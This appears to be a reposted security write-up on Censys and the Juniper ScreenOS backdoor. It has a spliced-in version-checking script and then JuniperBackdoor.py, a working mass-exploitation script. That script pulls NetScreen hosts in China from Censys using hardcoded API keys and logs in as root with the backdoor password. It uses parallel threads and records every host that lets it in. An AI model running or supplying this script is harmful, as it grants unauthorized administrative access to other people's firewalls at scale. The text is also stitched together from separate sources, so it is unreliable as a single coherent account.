Background:
Censys is a new search engine for information about networked devices. Security experts can use it to assess the security of their own deployments, and hackers can use it as a powerful tool for preliminary reconnaissance and for collecting information about targets. Its function is very similar to that of the popular Shodan; its advantage over Shodan is that it is a free search engine. It was originally released in October by researchers at the University of Michigan and is currently supported by Google.
Bob Worrall, Juniper's senior vice president and Chief Information Security Officer, said that a recent internal code audit discovered two vulnerabilities affecting ScreenOS versions 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20. One is unauthorized code that allows VPN traffic to be decrypted; the other could allow an attacker to gain remote administrative access to the device over SSH or telnet. Juniper noted that access to these systems is logged and that the log shows password authentication as successful, but the attacker can change or delete the log entries.
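The affected version ranges quoted above can be checked against a device inventory. The following is an added example, not part of the original post or of JuniperBackdoor.py; the hostnames and inventory are constructed, and treating suffixed builds such as 6.3.0r19b like their base release is an assumption.

```python
import re

# Affected ScreenOS ranges as stated above: release train -> inclusive (first, last) "r" number.
AFFECTED = {
    (6, 2, 0): (15, 18),
    (6, 3, 0): (12, 20),
}

# Matches "6.3.0r17" and tolerates a trailing build suffix such as "6.3.0r19b" or "6.3.0r17.0"
# (assumption: a suffixed build has the same status as its base release).
_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)r(\d+)(?:[.a-z][\w.-]*)?\s*$", re.IGNORECASE)

def parse_version(text):
    """Return ((major, minor, patch), release) or None if the string is not recognised."""
    m = _VERSION_RE.match(text)
    if not m:
        return None
    major, minor, patch, release = (int(g) for g in m.groups())
    return (major, minor, patch), release

def classify(text):
    """Return 'affected', 'not-affected' or 'unknown' for one version string."""
    parsed = parse_version(text)
    if parsed is None:
        return "unknown"  # an unparseable version is never reported as safe
    train, release = parsed
    bounds = AFFECTED.get(train)
    if bounds and bounds[0] <= release <= bounds[1]:
        return "affected"
    return "not-affected"

def audit(inventory):
    """Group hostnames by status; inventory is an iterable of (hostname, version)."""
    report = {"affected": [], "not-affected": [], "unknown": []}
    for host, version in inventory:
        report[classify(version)].append(host)
    return report

# Constructed sample inventory (hypothetical hostnames, not from the page).
SAMPLE = [
    ("fw-edge-01", "6.3.0r17"), ("fw-edge-02", "6.3.0r21"),
    ("fw-branch-03", "6.2.0r15"), ("fw-branch-04", "6.2.0r14"),
    ("fw-lab-05", "6.3.0r19b"), ("fw-lab-06", "unknown-build"),
]

if __name__ == "__main__":
    for status, hosts in audit(SAMPLE).items():
        print(status, hosts)
```

Hosts reported as "unknown" need a manual version check before they are treated as unaffected.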
JuniperBackdoor.py Script:
```python
from pexpect import pxssh
from Queue import Queue
import threading
import time
import re
import sys
import json
import requests
import math

user = "root"
passwd = "<<< %s(un='%s') = %u"
API_URL = "https://www.censys.io/api/v1"
UID = "373ab943-2e4b-4088-b1ac-396c0c21ce2c"
SECRET = "sRwAT71mrRJnyZBD95sjEjkFLXRjP5n6"
PAGES = 50
cur_page = 1
thread_num = 20
queue = Queue()

class testTarget(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        global queue
        while True:
            for i in range(5):
                if not queue.empty():
                    ip = queue.get()
                else:
                    break
                theSSH = connectSSH(ip, user, passwd)
                if theSSH:
                    before = theSSH.before
                    try:
                        theSSH.logout()
                    except:
                        pass
                    isval = re.search('Remote Management Console', before)
                    if isval:
                        print "%s is vul" % ip
                        ip_OK.write("%s\n" % ip)
                        ip_OK.flush()
                    else:
                        print "%s is not vul" %ip
            time.sleep(1)

def connectSSH(host, user, passwd):
    try:
        ssh = pxssh.pxssh()
        ssh.login(host, user, passwd, auto_prompt_reset = False)
        return ssh
    except Exception, e:
        print "%s is not vul" % host

def getIp(page):
    start_time = time.time()
    data = {
        "query":"22.ssh.banner.software_version:NetScreen location.country:China",
        "page":page,
        "fields":["ip"]
    }
    try:
        res = requests.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET))
    except:
        pass
    else:
        try:
            results = res.json()
        except:
            pass
        else:
            if res.status_code != 200:
                print "error occurred: %s" % results["error"]
                sys.exit(1)
            else:
                result_iter = iter(results["results"])
                for result in result_iter:
                    queue.put(result["ip"])

def test():
    for i in range(thread_num):
        t = testTarget()
        t.start()

if __name__ == '__main__':
    ip_OK = open("ip_OK.txt", "w")
    getIp(cur_page)
    test()
    while queue.qsize() > 0:
        if cur_page <= PAGES:
            getIp(cur_page)
            cur_page += 1
        time.sleep(0.1)
    ip_OK.close()
```
Source : https://github.com/s0m30ne